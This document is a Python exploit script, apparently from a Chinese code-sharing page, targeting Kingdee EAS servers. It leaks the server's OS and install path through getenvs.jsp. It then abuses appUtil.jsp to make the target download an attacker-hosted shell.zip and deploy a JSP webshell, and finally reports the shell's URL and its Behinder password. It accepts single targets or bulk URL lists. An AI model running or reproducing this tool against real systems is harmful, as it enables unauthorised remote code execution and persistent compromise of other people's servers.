登录 白背景
源码 
import argparse
from cgitb import text
import os
from pickletools import pyint
import re
import warnings
import requests
from termcolor import cprint

requests.packages.urllib3.disable_warnings()
warnings.filterwarnings('ignore')
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '1'

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    # 'Connection':'keep-alive',#默认时链接一次,多次爬取之后不能产生新的链接就会产生报错Max retries exceeded with url
    'Upgrade-Insecure-Requests': '1',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
    'Connection': 'close',  # 解决Max retries exceeded with url报错
}

def verify(url_arg, file_arg,exp_arg):
    result_txt = open('./result.txt', 'a+', encoding='utf-8')
    result_txt.truncate(0)
    result_txt.close()
    if url_arg is None:
        urlfile = open('{}'.format(file_arg),
                       encoding='utf8').read().splitlines()
    else:
        urlfile = ['{}'.format(url_arg)]
    for u in urlfile:
        if 'http' in u:
            url = u
        else:
            url = 'http://'+str(u)
        cprint("[-] 正在检测{}".format(url), 'yellow')
        try:
            base_url = str(url)+"/easportal/tools/getenvs.jsp"
            resp = requests.get(
                url=base_url, headers=headers, timeout=5, verify=False)
            if resp.status_code == 200 and 'EAS_HOME' in resp.text:
                text = resp.text.replace('\n', '').replace('\r', '').replace('\t', '').replace(
                    ' ', '').replace('  ', '').replace('   ', '').replace('    ', '')
                SERVER_NAME_LISTS = re.findall(r'<tdalign="left"valign="top">OS_NAME</td><tdalign="left"valign="top">(.*?)</td>',text,re.S)
                HOME_PATH_LIST = re.findall(
                    r'<tdalign="left"valign="top">EAS_HOME</td><tdalign="left"valign="top">(.*?)</td>', text, re.S)
                if len(SERVER_NAME_LISTS) > 0:
                    cprint('[+] 识别到操作系统为:{}'.format(SERVER_NAME_LISTS[0]),'green')
                if len(HOME_PATH_LIST)> 0:
                    cprint('[+] 识别到安装目录为:{}'.format(HOME_PATH_LIST[0]),'green')
                    exp(HOME_PATH_LIST[0],str(url),exp_arg)
            else:
                pass
        except Exception as e:
            pass

def exp(self,base_url,exp_url):
    try:
        exp_base_url = base_url +'/easportal/tools/appUtil.jsp?EAS_HOME={}&type=Rabb&downloadUrl={}'.format(str(self),str(exp_url))
        resp_exp = requests.get(url=exp_base_url, headers=headers, timeout=5, verify=False)
        if resp_exp.status_code == 200 and 'false' in resp_exp.text:
            verify_url = base_url+'/easportal/tools/deploy/qaxnbshell.jsp'
            resp_verify = requests.get(url=verify_url, headers=headers, timeout=5, verify=False)
            if resp_verify.status_code == 200:
                cprint('================================','green')
                cprint('[+] webshell上传成功','green')
                cprint('[+] webshell地址:{}  密码:rebeyond,链接工具:冰蝎'.format(verify_url),'green')
                with open('./result.txt', 'a+') as f:
                    f.write('webshell地址:{}  密码:rebeyond,链接工具:冰蝎'.format(verify_url))
                    f.write('\n')
                cprint('================================','green')
            else:
                cprint('[-] webshell上传失败','red')
        else:
            cprint('[-] webshell上传失败','red')
            pass
    except Exception as e:
        print(e)
        pass


def main():
    parser = argparse.ArgumentParser(
        description='''
        金蝶EAS远程命令执行检测poc
        使用时请将本地的shell.zip上传到vps中
        将url填写到-e后面参数中
        by zhizhuo
        ''')
    parser.add_argument('-u', '-url', dest="url",
                        help='单个url检测,输入样例http://www.baidu.com', required=False)
    parser.add_argument('-f', '-file', dest="url_file", nargs='?',
                        help='多个url检测,以文件形式存储,文件中的url格式为http://www.baidu.com或者www.baidu.com', required=False)
    parser.add_argument('-e', '-exp', dest="exp_url", nargs='?',
                        help='请将文件中的shell.zip上传远程VPS,这里里面填写url地址http://xxx.xxx.xx/shell.zip', required=False)
    url_arg = parser.parse_args().url
    file_arg = parser.parse_args().url_file
    exp_arg = parser.parse_args().exp_url
    cprint('''
        金蝶EAS远程命令执行检测poc
        使用时请将本地的shell.zip上传到vps中
        将url填写到-e后面参数中
        by zhizhuo
        ''', "green")
    if exp_arg is None:
        cprint('''
        请输入本地shell.zip上传后远程url地址
        url地址为http://xxx.xxx.xx/shell.zip
        ''', "green")
    else:
        if ('http://' in exp_arg and '.zip' in exp_arg) or ('https://' in exp_arg and '.zip' in exp_arg):
            pass
        else:
            cprint('[-] 远程url地址有误请重新输入', 'red')
    if file_arg is None and url_arg is None:
        cprint("请使用命令-h查看命令使用帮助 --by zhizhuo", 'green')
    else:
        verify(url_arg, file_arg,exp_arg)


if __name__ == '__main__':
    main()